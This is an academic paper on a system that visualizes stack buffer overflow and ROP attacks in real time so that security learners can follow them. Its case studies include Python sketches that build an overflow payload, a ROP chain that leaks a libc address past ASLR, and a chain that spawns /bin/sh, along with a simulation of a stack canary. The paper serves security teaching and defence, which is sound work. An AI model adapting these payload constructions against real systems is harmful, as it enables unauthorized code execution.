Real-time Attack-Scheme Visualization for Complex Exploit Technique Comprehension

Recent exploit techniques are highly complex, and it is not easy for cybersecurity learners to understand the attack strategies quickly and clearly. For efficient and comprehensive learning, this paper proposes an attack-scheme visualization system that fulfills three requirements: real-time visualization of attack progress, memory- and register-level description, and concise description of the attack schemes. This paper presents two case studies, stack buffer overflow and return-oriented programming (ROP) attacks, and demonstrates how the system operates and how users can learn whether existing defense technologies are effective or ineffective depending on the execution environment.


I. INTRODUCTION
Nowadays, new vulnerabilities in software and hardware are discovered every day, and new attack techniques that exploit them are continually developed. Software and hardware vendors have devised a variety of countermeasures against those attack techniques; nevertheless, attackers have come up with ways to circumvent the countermeasures. Advances in attack technologies are being accelerated by various bug bounty programs (HackerOne, iDefense, etc.) and numerous hacking competitions (Pwn2Own, Mobile Pwn2Own, DEFCON, etc.).
Because of this arms race between attackers and defenders, highly sophisticated cyber-attack techniques, such as control-flow hijack attacks [1], have been developed. One of them is return-oriented programming (ROP) [2], an exploit technique that allows attackers to hijack the control flow by executing short machine instruction sequences called gadgets, each of which is already present in the machine's memory and ends with a return instruction. It has been reported that attackers can perform arbitrary operations by chaining gadgets together [3].
Meanwhile, the growing security market requires more security professionals. The need for skilled practitioners is projected to grow at a rate of 32% [4]. In our opinion, training systems for security specialists should satisfy the following three requirements for efficient and comprehensive learning: 1) The system should provide an environment in which exploit codes can actually run (i.e., it should not be a simulator or emulator), and should visualize what the code is doing in real time, because learners can gain a lot of knowledge by modifying and executing the codes. 2) The system should explain exploit techniques in sufficient detail; it should describe "how the exploit codes work" rather than "what they can do." An assembly-language-level explanation is preferred to a script-level one such as that of Metasploit [5]. 3) The system should present only the essential information related to the attack. Current exploit codes are highly complex and often include unnecessary instructions. Analysis tools [6] and debuggers provide sufficient detail but, at the same time, too much unrelated information. Filtering out irrelevant information in advance can enhance the efficiency of learning.
There are companies, such as Palo Alto Networks, Cisco, and IBM, and open-source frameworks, such as FBCTF [7] and CyTrONE [8], that provide cyber ranges, i.e., virtual environments for cyberwarfare training and cyber technology development. These focus on teaching best practices for responding to network cyber-crime rather than teaching how attack codes work. Another way to practice and learn hacking tools is to create a personal hacking lab, an isolated sandbox environment. A hacking lab typically uses open-source software, such as Kali Linux [9] and Metasploitable [5]. A hacking lab explains what the script-level attack commands can do rather than how the attack codes work. To learn more deeply, learners must spend a great deal of time reading source code.
The prototype system in this paper is designed to visualize in real time the detailed mechanisms that form the essence of attack schemes. As far as we know, no previous study has discussed this type of learning system. The learning system currently has three functions. (1) The system displays the detailed status of a running exploit process on web pages. (2) The system can explain to learners why some defense techniques against the attack are effective or ineffective. Lastly, (3) the system tests learners' comprehension, for example, by asking them to write an attack code applicable to a modified vulnerable code.
The paper is organized as follows. Section II presents the work related to this paper. Section III describes how the system visualizes a running attack code in real time. Although there are numerous complex control-flow hijacking techniques, our prototype system currently supports stack buffer overflow and ROP attacks. Section IV exemplifies the visualization of these two attacks. Section V discusses how to deepen the knowledge about the attacks, and Section VI concludes the paper.

II. RELATED WORK
Recent cyber-attack techniques, especially control-flow hijacking, are highly complex, and numerous variants of the techniques have been developed [10]. Furthermore, there are studies that automatically produce exploit codes for buffer overflows [11], ROP chains [12], heap overflows [13], etc.
To keep up with the development speed of attack tools, various mitigation technologies have been developed, including Address Space Layout Randomization (ASLR) [14], No eXecute bit (NX bit) [15], Stack Smashing Protection (SSP) [16], Position-Independent Executable (PIE) [17], and RELocation Read-Only (RELRO) [18]. The state-of-the-art defense technologies, whose implementations are currently research prototypes, are control-flow integrity (CFI) [19] and code-pointer integrity (CPI) [20]. None of them, however, can completely defeat the exploit techniques.
Another way to prevent or mitigate cyber-attacks is to practice hands-on training in a cyber range, where trainees experience attacks in order to find the best responses to them. There are studies that simulate attack situations for understanding basic concepts [21]-[23]. Realistic cybersecurity training is currently conducted in military environments, and the proprietary systems that are publicly available are expensive [8]. Some open-source training frameworks [7], [8] have recently become available. They are, however, not suited for efficiently learning how attack codes work.

III. SYSTEM CONFIGURATION
Fig. 1 illustrates the structure of our prototype system, which consists of two modules: exploit and web-app. The exploit module attacks a vulnerable binary code vuln (whose C language source code is vuln.c) using pwntools, an exploit development library that helps attackers create attack codes in the following three steps. First, it indicates what kinds of defense mechanisms the vulnerable code and the operating system have (Fig. 2). Second, it searches for vulnerabilities in the code. Third, it assists in creating attack codes to exploit the vulnerabilities. An attack code is not created automatically; it is assembled by attackers. To make the attackers' scheme understandable, our system displays the memory data of a running vulnerable code in real time. This is feasible because the proc filesystem (procfs) [24] provides the file /proc/PID/mem, which exposes the memory of the running process whose process ID is PID. The exploit module retrieves an important part of the stack data from the file and then transfers the data to the Firefox browser in JSON format. The Selenium framework is used to adjust the timing of displaying the retrieved data on the browser.
When the browser is instructed to open the URL http://127.0.0.1:3000 using the HTTP GET method, the web-app module returns the web page, which is constructed with Flask, a web application framework. In Fig. 1, only an essential portion of the process memory is displayed on the browser, and easy-to-understand comments are attached.
The system requires two executable statements to be added to the vulnerable code. The first is a function call that outputs the address of the buffer used in the attack, so that the system can recognize which part of the stack area it should focus on (the address can be automatically retrieved from the /proc/PID/mem file if ASLR is not enabled). In Fig. 1, printf("[+] address: %p\n\n", &name) in vuln.c corresponds to this statement. The second is the function call sleep(3), which delays the execution of the following statement by three seconds. It must be inserted just before a return or exit statement; otherwise, the system may not be able to read the data in the memory file because the process has already terminated.
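The memory-retrieval step described above can be sketched as follows. This is only a minimal illustration under stated assumptions, not the authors' exploit module: the function names read_stack_words and snapshot_as_json, the JSON field names, and the default of eight 64-bit words are hypothetical. Only the use of /proc/PID/mem and of JSON as the transfer format comes from the text.

```python
import json
import struct


def read_stack_words(mem_path, address, count):
    """Read `count` little-endian 64-bit words starting at `address`.

    `mem_path` is expected to be /proc/PID/mem, but any seekable binary
    file works, which keeps the function easy to try out.
    """
    with open(mem_path, "rb") as mem:
        mem.seek(address)
        raw = mem.read(8 * count)
    if len(raw) != 8 * count:
        raise OSError("short read from " + mem_path)
    values = struct.unpack("<%dQ" % count, raw)
    # One row per stack slot: where it is and what it currently holds.
    return [
        {"address": hex(address + 8 * i), "value": "0x%016x" % value}
        for i, value in enumerate(values)
    ]


def snapshot_as_json(pid, address, count=8):
    """Serialize a stack snapshot of process `pid` (hypothetical helper).

    Reading /proc/PID/mem normally requires ptrace-level permission over
    the target process, e.g. being its parent or running as root.
    """
    rows = read_stack_words("/proc/%d/mem" % pid, address, count)
    return json.dumps(rows)
```

Here `address` would be the buffer address printed by the vulnerable program, and the call has to happen while the process is still alive, which is the reason for the sleep(3) statement.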

IV. CASE STUDIES
This section illustrates the feasibility of our approach. The prototype software running on an Ubuntu 18.04.3 LTS machine visualizes two attacks: stack buffer overflow and ROP attacks.

A. Stack Buffer Overflow
Stack buffer overflow attacks are classical and straightforward, and at least five countermeasures have been implemented in the current Ubuntu system: RELRO, SSP, NX bit, PIE, and ASLR. These are explained later when necessary. Fig. 2 shows their status. ASLR, which is a system-wide property, is enabled in our environment. Under the environment shown in Fig. 2, our system exemplifies how an overflow attack can divert the flow of execution to an arbitrary function or code, using the binary code vuln (whose source code vuln.c is in Fig. 1).
If a function, say secret(), is also defined in the vuln.c file and the name of the function is known a priori, then pwntools can derive the memory address of the function from the symbol name "secret". When vuln prompts for a name (see puts("Please input your name") in vuln.c), the exploit sends 49 bytes of data (called a payload from now on), which consist of 40 'A' characters, the 8-byte address of function secret(), and a line feed code. The intent of the exploit becomes clear through visualization. Fig. 3 shows the web pages output by the system. It can be easily recognized that the overflow attack overwrites not only the buffer area with 'A' characters but also the return address of __libc_start_main with the address of function secret(), which implies that the exploit module has taken control of the execution flow.
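The 49-byte payload described above can be reproduced with the standard library alone. In this sketch the address SECRET_ADDR is a hypothetical placeholder (the real value is derived from the symbol table of vuln), and build_overflow_payload is an illustrative name rather than part of the system.

```python
import struct

PADDING_LEN = 40        # number of 'A' characters, as stated in the text
SECRET_ADDR = 0x401156  # hypothetical address of secret(); not from the paper


def build_overflow_payload(target_addr, padding_len=PADDING_LEN):
    """Padding, then the new return address (little-endian), then a line feed."""
    return b"A" * padding_len + struct.pack("<Q", target_addr) + b"\n"


payload = build_overflow_payload(SECRET_ADDR)
print(len(payload))  # 49 = 40 + 8 + 1
```

The address is packed in little-endian order because that is how x86-64 stores a 64-bit return address on the stack.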

B. Return-Oriented Programming
ROP further extends the potential of buffer overflow attacks. An overflow attack often inserts malicious code into a data storage area. Even if the NX bit [15] marks the storage area non-executable, ROP attacks can circumvent this mechanism by using existing code in static or dynamic libraries. ROP is therefore a code-reuse attack. In ROP attacks, attackers often build complex payloads that consist of a variety of "ROP gadgets," which are short sequences of assembly instructions that end with ret, and place them in the stack area.
In this case study, the system demonstrates how an attacker can invoke the shell /bin/sh using the vulnerable code vuln under the same conditions shown in Fig. 2. Note that, in general, the ability of adversaries to operate the shell without formal login authentication implies that they can remotely control the target machine. The exploit executes the function main() in vuln.c twice to cope with another defense mechanism, ASLR [14], which randomizes the positions of the stack, heap, libraries, etc. in the address space.
Fig. 3. The web page before and after the overflow attack. The ASCII code of character 'A' is 41 in hexadecimal notation.
Fig. 4 shows a log file of pwntools, which records all interactions with other functions; "Sent" ("Received") in the log file indicates data sent (received) by the exploit module. As shown in the figure, the exploit sends 0x49-byte (73-byte) data twice and receives an address (libc: 0x7fb895320000), which is the base address of library libc randomly selected by ASLR. Note that the exploit successfully invokes /bin/sh; the last line of the log file contains "$," which serves as the prompt of the shell.
The log file explains almost nothing about why the shell prompt appears. By contrast, our system clearly reveals the essence of the attacker's tactics in real time by outputting the web pages in Fig. 5 and Fig. 6. As shown in Fig. 5, using the stack buffer overflow, the first payload overwrites the return address with the address of a gadget that executes only two instructions: pop rdi and ret. When the gadget is executed, the stack pointer register (RSP) points to the stack slot immediately after the overwritten return address, which holds the address of puts@got. Since the gadget executes pop rdi, the address of puts@got is moved to the RDI register, and the gadget's ret transfers the execution flow to the address stored in the next slot, namely that of puts@plt. Therefore, function puts() outputs the value stored at puts@got, i.e., the current address of puts(), and returns to the address stored in the following slot, namely that of main(). In short, the aim of the exploit is to execute "puts(puts@got)" and go back to main(). The values of the registers change with time. In Fig. 5, RDI holds the address of puts@got and RSP points to the slot that holds the address of main(). Therefore, the figure expresses the state of the memory and registers just before the main function is executed again.
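The stack layout written by the first payload can be sketched as below. All four addresses are hypothetical placeholders, and the 40-byte padding is assumed to be the same as in the stack buffer overflow case; under that assumption the total length matches the 0x49 bytes recorded in the pwntools log.

```python
import struct

PADDING_LEN = 40        # assumed to equal the padding of the overflow case
# Hypothetical addresses inside vuln; real values come from the binary.
POP_RDI_RET = 0x401233  # gadget: pop rdi; ret
PUTS_GOT = 0x404018     # GOT entry that holds the runtime address of puts()
PUTS_PLT = 0x401030     # PLT stub used to call puts()
MAIN = 0x401176         # main(), re-entered to accept the second payload


def p64(value):
    """Pack a 64-bit value in little-endian byte order."""
    return struct.pack("<Q", value)


def build_leak_payload():
    """Chain that executes puts(puts@got) and then returns to main()."""
    chain = [
        POP_RDI_RET,  # overwrites the return address; runs first
        PUTS_GOT,     # popped into RDI by the gadget
        PUTS_PLT,     # target of the gadget's ret: puts(RDI)
        MAIN,         # where puts() returns to
    ]
    return b"A" * PADDING_LEN + b"".join(p64(a) for a in chain) + b"\n"


leak_payload = build_leak_payload()
print(hex(len(leak_payload)))  # 0x49
```

Reading the chain from top to bottom gives the order in which the stack slots are consumed, which is the sequence the web page in Fig. 5 is described as showing.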
The address leaked from puts@got, i.e., the current address of puts(), is used to calculate the address of function system(), which executes /bin/sh. The address of system() is obtained by adding the base address of library libc to the relative address of symbol 'system' in the library. Because ASLR is enabled, the base address of library libc is randomly selected; nevertheless, the exploit can obtain the base address by subtracting the relative address of symbol 'puts' from the leaked address.
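The address arithmetic above amounts to one subtraction and one addition. In the following sketch the two libc offsets are hypothetical (they depend on the libc build and are normally read from its symbol table), and parse_leak is an illustrative helper. The base address 0x7fb895320000 is the one reported in the log of Fig. 4.

```python
import struct

# Hypothetical symbol offsets inside libc; they differ between libc builds.
PUTS_OFFSET = 0x809C0
SYSTEM_OFFSET = 0x4F440


def parse_leak(line):
    """Convert the bytes printed by puts(puts@got) into an integer.

    puts() stops at the first NUL byte, so a user-space address usually
    arrives as six bytes followed by a line feed.
    """
    raw = line[:-1] if line.endswith(b"\n") else line
    if len(raw) > 8:
        raise ValueError("leak is longer than a 64-bit pointer")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def resolve_system(leaked_puts):
    """Return (libc base, address of system()) from the leaked puts()."""
    libc_base = leaked_puts - PUTS_OFFSET
    return libc_base, libc_base + SYSTEM_OFFSET


# Example leak constructed so that the base equals the value in Fig. 4.
leak_line = struct.pack("<Q", 0x7FB895320000 + PUTS_OFFSET)[:6] + b"\n"
libc_base, system_addr = resolve_system(parse_leak(leak_line))
print(hex(libc_base))    # 0x7fb895320000
print(hex(system_addr))  # 0x7fb89536f440
```

ASLR randomizes only the base address, not the distance between symbols inside the library, which is why a single leaked address is enough.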
In Fig. 6, there are two ROP gadgets. The first gadget is not superfluous; it is needed for the movaps instruction to work properly (movaps requires its memory operand to be 16-byte aligned). The second puts the address of the string "/bin/sh" in RDI so that system() invokes /bin/sh. Now that the address of system() has been resolved, it is included in the second payload.
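A possible layout of the second payload is sketched below. It assumes that the first gadget is a lone ret used to adjust the stack alignment, that the padding is again 40 bytes, and that the "/bin/sh" string is taken from libc; the gadget addresses and libc offsets are hypothetical. Under these assumptions the length is again 0x49 bytes, consistent with the log stating that 0x49-byte data is sent twice.

```python
import struct

PADDING_LEN = 40          # assumed to equal the padding of the first payload
RET = 0x40101A            # hypothetical gadget: ret (alignment only)
POP_RDI_RET = 0x401233    # hypothetical gadget: pop rdi; ret
SYSTEM_OFFSET = 0x4F440   # hypothetical offset of system() in libc
BINSH_OFFSET = 0x1B3E9A   # hypothetical offset of the "/bin/sh" string in libc


def p64(value):
    """Pack a 64-bit value in little-endian byte order."""
    return struct.pack("<Q", value)


def build_shell_payload(libc_base):
    """Chain that executes system("/bin/sh") once libc's base is known."""
    chain = [
        RET,                        # first gadget: shifts RSP by 8 bytes
        POP_RDI_RET,                # second gadget: loads the argument
        libc_base + BINSH_OFFSET,   # popped into RDI
        libc_base + SYSTEM_OFFSET,  # called with RDI -> "/bin/sh"
    ]
    return b"A" * PADDING_LEN + b"".join(p64(a) for a in chain) + b"\n"


shell_payload = build_shell_payload(0x7FB895320000)
print(hex(len(shell_payload)))  # 0x49
```

Without the extra ret, RSP may be off by 8 bytes when system() runs, and an aligned store such as movaps inside libc can then fault.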

V. FURTHER LEARNING
Learners can observe the behavior of payloads and defense systems more clearly by modifying the vulnerable code or the execution environment. Let us consider the case where a learner changes a gcc compiler option so that the SSP mechanism [16] is enabled. Fig. 7 shows that SSP inserted a stack canary between the buffer name[] and the return address just after scanf("%s", name) was called. After the ROP attack, as shown in Fig. 8, the canary was overwritten with 0x4141414141414141. A changed canary value at the time the function returns indicates that a buffer overflow has occurred. The memo in the figure indicates that the process was terminated because stack smashing was detected. The termination prevents the exploit from taking control of the process. Learners can further deepen their knowledge by creating a payload that solves the problems given by the system. For example, the system asks learners to invoke /bin/sh when the buffer size of name[] in vuln.c is reduced from 32 to 16 bytes.
Since our system can visualize the memory content of processes in real time, it can be readily extended to support other kinds of control-flow hijacking attacks, including heap overflow and format string attacks.
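The canary check can be illustrated with a small simulation of a stack frame held in a Python bytearray. This is a toy model, not the code generated by gcc: the frame layout (32-byte buffer, canary, saved RBP, return address) and all function names are assumptions made for illustration.

```python
import os
import struct

BUF_SIZE = 32  # size of name[] according to the text


def make_frame(canary, saved_rbp, ret_addr):
    """Simulated frame: buffer | canary | saved RBP | return address."""
    return bytearray(BUF_SIZE) + bytearray(
        struct.pack("<QQQ", canary, saved_rbp, ret_addr)
    )


def unchecked_copy(frame, data):
    """Mimic scanf("%s", name): copy without checking the buffer size."""
    if len(data) > len(frame):
        raise ValueError("data exceeds the simulated frame")
    frame[0:len(data)] = data


def read_canary(frame):
    return struct.unpack_from("<Q", frame, BUF_SIZE)[0]


# A random canary whose lowest byte is zero, as is common on Linux.
canary = int.from_bytes(os.urandom(7), "little") << 8
frame = make_frame(canary, saved_rbp=0x7FFD00001000, ret_addr=0x401200)

# 40 'A' characters followed by a hypothetical 8-byte address.
unchecked_copy(frame, b"A" * 40 + struct.pack("<Q", 0x401156))

observed = read_canary(frame)
smashing_detected = observed != canary
print(hex(observed))      # 0x4141414141414141
print(smashing_detected)  # True
```

Because the canary lies between the buffer and the control data, a linear overflow cannot reach the return address without changing the canary first, and the check before the function returns terminates the process.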

VI. CONCLUSIONS AND FUTURE WORK
Current exploit techniques are highly sophisticated and complex. For efficient and comprehensive learning of the techniques, we proposed a new approach that achieves real-time attack progress visualization, assembly language-level detailed description, and concise description of the attack schemes. Our idea was to display attack code behavior in the stack area in cooperation with the proc filesystem.
A prototype system that visualizes stack buffer overflow and return-oriented programming attacks demonstrated the feasibility of our approach. The system enables learners to further deepen their knowledge by modifying the vulnerable code or the execution conditions and then running the code again.
We are currently planning two research projects. The first is to implement the system as a web application so that users can learn from a distance. The second is to visualize more complex control-flow hijack attacks such as heap overflow.